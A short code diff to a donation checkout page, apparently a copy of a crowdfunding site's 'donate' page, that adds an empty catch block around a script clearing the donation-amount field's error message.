--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -11,6 +11,8 @@
 				document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field--error").className = 'm-form-field m-form-field--stacked o-checkout-donation-amount m-currency-field m-currency-field';
 				document.querySelector("#root > div > main > div > div > div.l-checkout-single-page.disp-flex.align-center > div > form > div.mb-three-halves.o-checkout-donation > div.m-form-field.m-form-field--stacked.o-checkout-donation-amount.m-currency-field.m-currency-field > div.m-form-field-alert.mt-half.a-field-alert.a-field-alert--error").remove();
 				}
+			catch{
+			}
 		});
 		
 					
